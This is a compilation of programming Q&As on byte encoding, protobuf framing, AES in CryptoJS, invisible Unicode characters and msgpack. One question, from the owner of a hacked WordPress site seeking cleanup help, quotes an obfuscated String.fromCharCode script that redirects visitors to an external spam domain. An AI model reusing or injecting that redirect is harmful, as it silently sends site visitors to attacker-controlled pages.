Decode invalid utf-8 by replacing troublesome byte sequences with question marks?

The problem: I'm given a sequence of bytes (say, as a Uint8Array) that I'd like to interpret as a UTF-8-encoded string. That is, I'd like to decode the bytes into a valid Unicode string.
However, the bytes may not be a valid UTF-8 encoding. If that's the case, I'd like to make a "best effort" attempt to decode the string anyway.
In Python I can do the following:
>>> import codecs
>>> codecs.register_error('replace_?', lambda e: (u'?', e.start + 1))
>>> uint8array = map(ord, 'some mostly ok\x80string')
>>> uint8array
[115, 111, 109, 101, 32, 109, 111, 115, 116, 108, 121, 32, 111, 107, 128, 115, 116, 114, 105, 110, 103]
>>> ''.join(map(chr, uint8array)).decode('utf8', 'replace_?')
u'some mostly ok?string'
In JavaScript, I've learned the decoding would go as follows:
> uint8array = new Uint8Array([115, 111, 109, 101, 32, 109, 111, 115, 116, 108, 121, 32, 111, 107, 128, 115, 116, 114, 105, 110, 103])
[115, 111, 109, 101, 32, 109, 111, 115, 116, 108, 121, 32, 111, 107, 128, 115, 116, 114, 105, 110, 103]
> decodeURIComponent(escape(String.fromCharCode.apply(null, uint8array)))
Uncaught URIError: URI malformed(…)
As you can see, this raises an exception, much like the Python code would if I didn't specify my custom codec handler.
How would I go about getting the same behavior as the Python snippet - replacing the malformed utf8 bytes with '?' instead of choking on the whole string?
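A minimal sketch of one way to get this behavior, assuming an environment that provides the standard TextDecoder (modern browsers and recent Node.js versions). In its default non-fatal mode, TextDecoder substitutes U+FFFD for malformed input instead of throwing, and those can then be swapped for '?'. The function name decodeUtf8Lossy is made up for illustration. Two caveats: a U+FFFD that was validly encoded in the input also becomes '?', and the number of replacements per malformed run follows the decoder's own rules, which may differ from the Python handler for truncated multi-byte sequences.

```javascript
// Decode bytes as UTF-8, substituting '?' for every malformed sequence.
// decodeUtf8Lossy is a hypothetical helper name, not a built-in.
function decodeUtf8Lossy(bytes) {
  // With fatal: false (the default), invalid input yields U+FFFD instead of an exception.
  const decoder = new TextDecoder('utf-8', { fatal: false });
  return decoder.decode(bytes).replace(/\uFFFD/g, '?');
}

const uint8array = new Uint8Array([115, 111, 109, 101, 32, 109, 111, 115, 116, 108, 121, 32, 111, 107, 128, 115, 116, 114, 105, 110, 103]);
console.log(decodeUtf8Lossy(uint8array)); // "some mostly ok?string"
```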

Related

Prefix protobuf message with signed 4 byte int

I am working with a Websocket API which I send protobuf objects to.
The documentation says:
Server uses Big Endian format for binary data.
Messages sent back and forth require a signed 4 byte int of the message size, prefixed to the message
So the payload should be a 4 byte int which contains the message size, followed by the message itself.
I set the message like this:
const message = req.serializeBinary();
How would I prefix a signed 4 byte int that contains the message size to this?
Note: console.log(message) prints the following to the console:
jspb.BinaryReader {decoder_: j…b.BinaryDecoder, fieldCursor_: 0, nextField_: -1, nextWireType_: -1, error_: false, …}
decoder_: jspb.BinaryDecoder
bytes_: Uint8Array(78) [0, 0, 0, 74, 152, 182, 75, 75, 242, 233, 64, 4, 49, 48, 53, 57, 242, 233, 64, 35, 77, 101, 115, 115, 97, 103, 101, 32, 108, 101, 110, 103, 116, 104, 32, 114, 101, 99, 101, 105, 118, 101, 100, 32, 105, 115, 32, 105, 110, 118, 97, 108, 105, 100, 46, 194, 233, 64, 19, 82, 105, 116, 104, 109, 105, 99, 32, 83, 121, 115, 116, 101, 109, 32, 73, 110, 102, 111]
cursor_: 78
end_: 78
error_: false
start_: 0
__proto__: Object
error_: false
fieldCursor_: 55
nextField_: 132760
nextWireType_: 2
readCallbacks_: null

I have never used Google's protocol buffers library, only protobuf.js (https://github.com/protobufjs), but I assume we can work from your object, since everything we need is in message.bytes_:
const bl = message.bytes_.length;
const msg = new Uint8Array(bl + 4);
// Write the length as 4 big-endian bytes, most significant byte first.
msg.set([(bl >>> 24) & 0xff, (bl >>> 16) & 0xff, (bl >>> 8) & 0xff, bl & 0xff]);
// Copy the message bytes in after the 4-byte prefix.
msg.set(message.bytes_, 4);
yourwebsocketobject.send(msg); // or maybe msg.buffer?
You will probably get better answers, but this may work.
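The same framing can also be sketched with a DataView, which writes a signed 32-bit big-endian integer directly. This assumes the serialized message is available as a Uint8Array; prefixWithLength is a hypothetical helper name, not part of any protobuf library.

```javascript
// Return a new Uint8Array: 4-byte signed big-endian length, then the payload.
// prefixWithLength is a hypothetical helper name.
function prefixWithLength(payload) {
  const framed = new Uint8Array(4 + payload.length);
  // setInt32 writes a signed 32-bit integer; littleEndian = false means big-endian.
  new DataView(framed.buffer).setInt32(0, payload.length, false);
  framed.set(payload, 4);
  return framed;
}

console.log(Array.from(prefixWithLength(new Uint8Array([1, 2, 3])))); // [0, 0, 0, 3, 1, 2, 3]
```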

WordPress site hacked redirect

I have a WordPress website, and when I view the page source in Chrome it shows me this (look at the code):
So I searched my files and found a file called lt_ that contains that redirect code.
I want to know how to find the source of the malware.
<head>
<script>window.location.href = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 105, 114, 99, 46, 108, 111, 118, 101, 103, 114, 101, 101, 110, 112, 101, 110, 99, 105, 108, 115, 46, 103, 97, 47, 112, 86, 77, 89, 110, 49, 120, 82, 63, 101, 120, 116, 101, 114, 110, 97, 108, 95, 105, 100, 61, 50, 49, 38, 97, 100, 95, 99, 97, 109, 112, 97, 105, 103, 110, 95, 105, 100, 61, 52, 51, 54, 55, 53);</script>
</head>

Check wp-content/plugins/ and look for wp-sleeeps; that is the problem.
Delete wp-sleeeps and after that delete lt_.
I had the same problem for the last 3 hours.

First, install WordFence and configure it for a thorough scan, then see if anything suspicious pops up in the scan.
If you want to search the files for the string, I suggest installing a plugin, "String Locator". It's the quickest way to search through all WP files.
If your WP was hacked, in 99.9% of cases more than one file is affected.
When, and if, you identify the suspicious string, I suggest running it through the phpMyAdmin search as well to ensure it's not planted in the database on some of your pages.
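If you have shell access and Node.js available, a file search can also be sketched without a plugin. This is only an illustration: findFilesContaining and the example path are hypothetical, it reads every file fully into memory, and it skips symlinks.

```javascript
const fs = require('fs');
const path = require('path');

// Recursively list files under rootDir whose contents include needle.
// findFilesContaining is a hypothetical helper name.
function findFilesContaining(rootDir, needle) {
  const matches = [];
  for (const entry of fs.readdirSync(rootDir, { withFileTypes: true })) {
    const fullPath = path.join(rootDir, entry.name);
    if (entry.isDirectory()) {
      matches.push(...findFilesContaining(fullPath, needle));
    } else if (entry.isFile()) {
      // latin1 maps every byte to one character, so binary files do not break decoding.
      if (fs.readFileSync(fullPath, 'latin1').includes(needle)) {
        matches.push(fullPath);
      }
    }
  }
  return matches;
}

// Example call (the path is an assumption about where the site lives):
// console.log(findFilesContaining('/var/www/html', 'String.fromCharCode'));
```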

CryptoJS giving other results than Java's Cipher.doFinal()

I am trying to write a function in JavaScript that I already have in Java. The function simply encrypts a string with AES.
I tried different types like WordArray, ByteArray, String, HexString.
byte[] IV = new byte[] { 57, 118, 97, 110, 32, 77, 101, 100, 118, 101, 100, 101, 118, 100, 101, 118 };
byte[] md5 = { 52, -123, -23, -71, -89, 6, -59, -33, -48, 56, -69, -77, -100, 107, -68, 127 };
byte[] text= { 112, 101, 116, 101, 114, 46, 109, 111, 101, 108, 108, 101, 114, 64, 119, 101, 98, 46, 100, 101 };
String TRANSFORMATION = "AES/CBC/PKCS5Padding";
Cipher _cipher;
SecretKey _password;
IvParameterSpec _IVParamSpec;
_password = new SecretKeySpec(md5, ALGORITHM);
_IVParamSpec = new IvParameterSpec(IV);
_cipher = Cipher.getInstance(TRANSFORMATION);
_cipher.init(Cipher.ENCRYPT_MODE, _password, _IVParamSpec);
encryptedData = _cipher.doFinal(text);
Base64.Encoder enc = Base64.getEncoder();
String encData=enc.encodeToString(encryptedData);
var pass = CryptoJS.enc.Hex.parse(this.toWordArray([52, -123, -23, -71, -89, 6, -59, -33, -48, 56, -69, -77, -100, 107, -68, 127]));
var iv = CryptoJS.enc.Hex.parse(this.toWordArray([57, 118, 97, 110, 32, 77, 101, 100, 118, 101, 100, 101, 118, 100, 101, 118]));
var text = this.toWordArray([112, 101, 116, 101, 114, 46, 109, 111, 101, 108, 108, 101, 114, 64, 119, 101, 98, 46, 100, 101]);
var encrypted = CryptoJS.AES.encrypt(text, pass, { iv: iv, mode: CryptoJS.mode.CBC, padding: CryptoJS.pad.Pkcs7 });
var utf8 = CryptoJS.enc.Utf8.parse(encrypted);
var base64 = CryptoJS.enc.Base64.stringify(utf8);
In Java the result is: VmivVhaBFNdJQMY5JHczcs4VQXvzH3qEswsT4PufAqg=
In JavaScript I expect the same output, but I get: VVRGUVRVQlE5VTFOQ1pLb1FFMDhUY05LQzRNcGF3UTBnNE1ZZ3luQW1Vaz0=
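One thing the two outputs show: Base64-decoding the JavaScript value yields another 44-character Base64 string, which suggests the ciphertext was Base64-encoded twice. As an independent reference point, here is a hedged sketch using Node.js's built-in crypto module rather than CryptoJS. It assumes a 16-byte key (so AES-128) and converts Java's signed bytes to unsigned ones. The helper names are made up for illustration. Whether the result matches the Java output depends on the ALGORITHM constant, which the question does not show, and that match has not been verified here.

```javascript
const crypto = require('crypto');

// Java bytes are signed (-128..127); mask each one into the unsigned 0..255 range.
// fromSignedBytes and encryptAesCbcBase64 are hypothetical helper names.
function fromSignedBytes(signedBytes) {
  return Buffer.from(signedBytes.map((b) => b & 0xff));
}

function encryptAesCbcBase64(keyBytes, ivBytes, plainBytes) {
  // 'aes-128-cbc' assumes a 16-byte key; Node applies PKCS#7 padding by default.
  const cipher = crypto.createCipheriv('aes-128-cbc', fromSignedBytes(keyBytes), fromSignedBytes(ivBytes));
  const encrypted = Buffer.concat([cipher.update(fromSignedBytes(plainBytes)), cipher.final()]);
  return encrypted.toString('base64'); // encode the raw ciphertext exactly once
}

const key = [52, -123, -23, -71, -89, 6, -59, -33, -48, 56, -69, -77, -100, 107, -68, 127];
const iv = [57, 118, 97, 110, 32, 77, 101, 100, 118, 101, 100, 101, 118, 100, 101, 118];
const text = [112, 101, 116, 101, 114, 46, 109, 111, 101, 108, 108, 101, 114, 64, 119, 101, 98, 46, 100, 101];
console.log(encryptAesCbcBase64(key, iv, text));
```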

How can two visually identical bits of text be different to the clipboard?

I have a Sublime Text document with two identical file paths (on 2 separate lines). If I copy one, my app functionality works; if I copy the other, it does not.
When I select one line and press Cmd+D, you would expect Sublime to highlight both lines, as per normal functionality. It does not. This is also true in VS Code, so something is different about these two lines.
I have tried myData.toString().
I tried JSON.parse, but it didn't go well and I couldn't figure it out.
Here are the offending lines.
/Volumes/Macintosh HD/Archive/Work/AE_Scripting/⁨Resources⁩/⁨CEP-Resources-master⁩/⁨CEP_8.x⁩/⁨Documentation
-Works
/Volumes/Macintosh HD/Archive/Work/AE_Scripting/Resources/CEP-Resources-master/CEP_8.x/Documentation
Upon uploading an example file for this post, I now have some new information, as you can see here:
http://gravitystaging.com/uploadarea/test/examplefile.txt
Both lines now appear as
/Volumes/Macintosh HD/Archive/Work/AE_Scripting/â¨Resourcesâ©/â¨CEP-Resources-masterâ©/â¨CEP_8.xâ©/â¨Documentation
-Works
/Volumes/Macintosh HD/Archive/Work/AE_Scripting/Resources/CEP-Resources-master/CEP_8.x/Documentation
In any editor, though, they look normal and identical. So how can I process this string to remove these characters?

Your first string has some Unicode bidirectional formatting characters in it: U+2068 (FIRST STRONG ISOLATE) and U+2069 (POP DIRECTIONAL ISOLATE). You can use the ord function in Python to check for these:
>>> [ord(x) for x in '/Volumes/Macintosh HD/Archive/Work/AE_Scripting/⁨Resources⁩/⁨CEP-Resources-master⁩/⁨CEP_8.x⁩/⁨Documentation']
[47, 86, 111, 108, 117, 109, 101, 115, 47, 77, 97, 99, 105, 110, 116, 111, 115, 104, 32, 72, 68, 47, 65, 114, 99, 104, 105, 118, 101, 47, 87, 111, 114, 107, 47, 65, 69, 95, 83, 99, 114, 105, 112, 116, 105, 110, 103, 47, 8296, 82, 101, 115, 111, 117, 114, 99, 101, 115, 8297, 47, 8296, 67, 69, 80, 45, 82, 101, 115, 111, 117, 114, 99, 101, 115, 45, 109, 97, 115, 116, 101, 114, 8297, 47, 8296, 67, 69, 80, 95, 56, 46, 120, 8297, 47, 8296, 68, 111, 99, 117, 109, 101, 110, 116, 97, 116, 105, 111, 110]
See the ones that are 8000-something? Those are the Unicode markers you don't want.
If you just want to drop everything outside the Latin-1 range (which includes plain ASCII), here's how I would do that in Python:
''.join(c for c in my_string if ord(c) < 256)
This strips out anything higher than U+00FF.
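Since the question is about JavaScript, here is a rough equivalent there. This sketch removes only the common bidirectional formatting characters rather than everything non-Latin-1, so legitimate accented or non-Latin path components would survive. The names BIDI_CONTROLS, stripBidiControls and listNonAscii are made up for illustration.

```javascript
// Common Unicode bidirectional formatting characters:
// U+200E/U+200F (marks), U+202A-U+202E (embeddings/overrides), U+2066-U+2069 (isolates).
const BIDI_CONTROLS = /[\u200E\u200F\u202A-\u202E\u2066-\u2069]/g;

// Remove the invisible bidi characters and leave everything else untouched.
function stripBidiControls(text) {
  return text.replace(BIDI_CONTROLS, '');
}

// Diagnostic helper: list the code points above ASCII, like the ord() check in Python.
function listNonAscii(text) {
  return Array.from(text)
    .filter((ch) => ch.codePointAt(0) > 127)
    .map((ch) => 'U+' + ch.codePointAt(0).toString(16).toUpperCase().padStart(4, '0'));
}

const suspect = '/AE_Scripting/\u2068Resources\u2069/\u2068Documentation';
console.log(listNonAscii(suspect));      // [ 'U+2068', 'U+2069', 'U+2068' ]
console.log(stripBidiControls(suspect)); // "/AE_Scripting/Resources/Documentation"
```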

I'd recommend taking a look at using regex to remove all non-alphanumeric characters.
See https://stackoverflow.com/a/7225734/9899022
Since the pasted text and additional characters are already in string format, attempting to parse it to JSON or calling .toString() won't change anything about the variable.

If you cat your file in a (macOS) bash terminal, you will get identical lines. Running encguess examplefile.txt will tell you the format is UTF-8. Opening it in Sublime Text 3 with UTF-8 encoding will also show you identical lines.
But if you switch to Western (Windows 1252) encoding then you will get the exact same wrong symbols as in your example. So I guess you are using the wrong encoding to view your file.
How to switch encoding in SublimeText 3:
File => Reopen With Encoding => Choose your Encoding (UTF-8)
Edit
If you want to remove the wrong characters from your given string, you can use String.replace().
str = "/Volumes/Macintosh HD/Archive/Work/AE_Scripting/â¨Resourcesâ©/â¨CEP-Resources-masterâ©/â¨CEP_8.xâ©/â¨Documentation"
console.log("Before: ", str);
str = str.replace(/(â©)|(â¨)/g, "");
console.log("After: ", str);

I managed to solve this with the help of the following thread:
How to remove invalid UTF-8 characters from a JavaScript string?
function cleanString(input) {
    var output = "";
    for (var i = 0; i < input.length; i++) {
        // Keep only ASCII characters (code units 0 to 127).
        if (input.charCodeAt(i) <= 127) {
            output += input.charAt(i);
        }
    }
    return output;
}
It's something I looked at early on, but I must have been using it incorrectly.

Trying to get msgpack-cli to give me the same packed byte array as it does in JavaScript

In JavaScript, I can use msgpack to pack an object as follows:
msgpack.pack(payload);
Where payload is the following object:
var payload = { event: "phx_join", payload: {}, ref: "1", topic: "players:1" };
When I call msgpack.pack(payload); on this object, I get the following bytes back (as a Uint8Array):
[132, 165, 116, 111, 112, 105, 99, 169, 112, 108, 97, 121, 101, 114, 115, 58, 49, 165, 101, 118, 101, 110, 116, 168, 112, 104, 120, 95, 106, 111, 105, 110, 167, 112, 97, 121, 108, 111, 97, 100, 128, 163, 114, 101, 102, 161, 49]
How can I use msgpack-cli in C# to convert an object from C# to the same byte sequence as above? The object format I am using in C# is not so important, what's important is that the byte sequence is the same. Here is what I've tried:
public class Payload
{
    // "event" and "ref" are C# keywords, so they need the @ prefix as identifiers.
    public string @event;
    public MessagePackObject payload;
    public string @ref;
    public string topic;
}
var payload = new Payload
{
    @event = "phx_join",
    payload = new MessagePackObject(),
    @ref = "1",
    topic = "players:1"
};
var packedBytes = SerializationContext.Default.GetSerializer<Payload>().PackSingleObject(payload);
Unfortunately, the packed bytes I get back in this case are as follows:
[148, 168, 112, 104, 120, 95, 106, 111, 105, 110, 192, 161, 49, 169, 112, 108, 97, 121, 101, 114, 115, 58, 49]
It is not the same as the packed data I get from JavaScript. I thought MessagePack was supposed to be cross-platform friendly. What's going on here, and how can I create an equivalent C# object so that the serializer packs it to the same byte array as in JavaScript?

I figured it out. The trick is to check the first byte produced by the JavaScript encoder: 132 is 0x84 in hex. According to the MessagePack specification, 0x84 is a fixmap (0x80 to 0x8f). Using this hint, we can guess that a fixmap corresponds to a dictionary data type in C# (since a map is more or less a dictionary of key-value pairs).
We just need to use a payload object that is actually a dictionary of string and object pairs, and msgpack-cli will successfully pack it to the same byte sequence from C#:
var payload = new Dictionary<string, object>() {
{ "event", "phx_join" },
{ "payload", new Dictionary<string, object>() },
{ "ref", "1" },
{ "topic", "players:1" }
};
var packedBytes = SerializationContext.Default.GetSerializer<Dictionary<string, object>>().PackSingleObject(payload);
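The first-byte check described above can be sketched as a small helper that classifies a leading MessagePack byte. It covers only a few of the format ranges from the MessagePack specification, and describeMsgpackFirstByte is a made-up name. Applied to the two outputs in the question, it shows the JavaScript bytes start with a 4-entry map, while the original C# bytes start with a 4-element array.

```javascript
// Classify the leading byte of a MessagePack value (partial coverage of the spec).
// describeMsgpackFirstByte is a hypothetical helper name.
function describeMsgpackFirstByte(byte) {
  if (byte <= 0x7f) return `positive fixint (${byte})`;
  if (byte <= 0x8f) return `fixmap (${byte & 0x0f} entries)`;     // 0x80-0x8f
  if (byte <= 0x9f) return `fixarray (${byte & 0x0f} elements)`;  // 0x90-0x9f
  if (byte <= 0xbf) return `fixstr (${byte & 0x1f} bytes)`;       // 0xa0-0xbf
  if (byte === 0xc0) return 'nil';
  return `other (0x${byte.toString(16)})`;
}

console.log(describeMsgpackFirstByte(132)); // "fixmap (4 entries)", first byte from JavaScript
console.log(describeMsgpackFirstByte(148)); // "fixarray (4 elements)", first byte from the C# class
console.log(describeMsgpackFirstByte(165)); // "fixstr (5 bytes)", e.g. the key "topic"
```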
